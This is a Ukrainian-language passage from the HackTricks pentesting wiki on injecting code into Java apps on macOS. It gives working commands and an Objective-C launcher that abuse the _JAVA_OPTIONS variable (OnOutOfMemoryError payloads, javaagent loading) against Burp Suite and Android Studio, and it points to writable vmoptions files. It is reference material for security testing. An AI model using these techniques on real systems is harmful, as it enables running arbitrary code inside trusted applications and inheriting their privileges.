Поділіться своїми хакерськими трюками, надсилайте PR доHackTricksіHackTricks Cloudрепозиторіїв на GitHub.
Перелік
Знайдіть встановлені Java-додатки у вашій системі. Було помічено, що Java-додатки в Info.plist будуть містити деякі параметри Java, які містять рядок java., тому ви можете шукати це:
# Search only in /Applications foldersudofind/Applications-name'Info.plist'-execgrep-l"java\."{} \; 2>/dev/null# Full searchsudofind/-name'Info.plist'-execgrep-l"java\."{} \; 2>/dev/null
_JAVA_OPTIONS
Змінна середовища _JAVA_OPTIONS може бути використана для впровадження довільних параметрів Java у виконання скомпільованої програми Java:
# Write your payload in a script called /tmp/payload.shexport _JAVA_OPTIONS='-Xms2m -Xmx5m -XX:OnOutOfMemoryError="/tmp/payload.sh"'"/Applications/Burp Suite Professional.app/Contents/MacOS/JavaApplicationStub"
Для виконання його як нового процесу, а не як дитини поточного терміналу, ви можете використовувати:
#import <Foundation/Foundation.h>
// clang -fobjc-arc -framework Foundation invoker.m -o invoker
int main(int argc, const char * argv[]) {
@autoreleasepool {
// Specify the file path and content
NSString *filePath = @"/tmp/payload.sh";
NSString *content = @"#!/bin/bash\n/Applications/iTerm.app/Contents/MacOS/iTerm2";
NSError *error = nil;
// Write content to the file
BOOL success = [content writeToFile:filePath
atomically:YES
encoding:NSUTF8StringEncoding
error:&error];
if (!success) {
NSLog(@"Error writing file at %@\n%@", filePath, [error localizedDescription]);
return 1;
}
NSLog(@"File written successfully to %@", filePath);
// Create a new task
NSTask *task = [[NSTask alloc] init];
/// Set the task's launch path to use the 'open' command
[task setLaunchPath:@"/usr/bin/open"];
// Arguments for the 'open' command, specifying the path to Android Studio
[task setArguments:@[@"/Applications/Android Studio.app"]];
// Define custom environment variables
NSDictionary *customEnvironment = @{
@"_JAVA_OPTIONS": @"-Xms2m -Xmx5m -XX:OnOutOfMemoryError=/tmp/payload.sh"
};
// Get the current environment and merge it with custom variables
NSMutableDictionary *environment = [NSMutableDictionary dictionaryWithDictionary:[[NSProcessInfo processInfo] environment]];
[environment addEntriesFromDictionary:customEnvironment];
// Set the task's environment
[task setEnvironment:environment];
// Launch the task
[task launch];
}
return 0;
}
Проте це спричинить помилку в виконуваній програмі, інший, більш прихований спосіб - створити java-агент і використовувати:
export _JAVA_OPTIONS='-javaagent:/tmp/Agent.jar'"/Applications/Burp Suite Professional.app/Contents/MacOS/JavaApplicationStub"# Oropen--env"_JAVA_OPTIONS='-javaagent:/tmp/Agent.jar'"-a"Burp Suite Professional"
Створення агента з іншою версією Java від програми може призвести до збою виконання як агента, так і програми
І потім експортуйте змінну середовища та запустіть java-додаток так:
export _JAVA_OPTIONS='-javaagent:/tmp/j/Agent.jar'"/Applications/Burp Suite Professional.app/Contents/MacOS/JavaApplicationStub"# Oropen--env"_JAVA_OPTIONS='-javaagent:/tmp/Agent.jar'"-a"Burp Suite Professional"
Файл vmoptions
Цей файл підтримує вказівку параметрів Java при виконанні Java. Ви можете скористатися деякими попередніми трюками, щоб змінити параметри Java та змусити процес виконати довільні команди.
Більше того, цей файл також може включати інші файли з допомогою директиви include, тому ви також можете змінити включений файл.
Ще більше, деякі Java-додатки будуть завантажувати більше одного файлу vmoptions.
Деякі програми, такі як Android Studio, вказують у своєму виводі, де вони шукають ці файли, наприклад:
Якщо вони цього не роблять, ви легко можете перевірити це за допомогою:
# Monitorsudoesloggerlookup|grepvmoption# Give FDA to the Terminal# Launch the Java app/Applications/Android\Studio.app/Contents/MacOS/studio
Зверніть увагу, що в цьому прикладі Android Studio намагається завантажити файл /Applications/Android Studio.app.vmoptions, місце, де будь-який користувач з групи admin має право на запис.
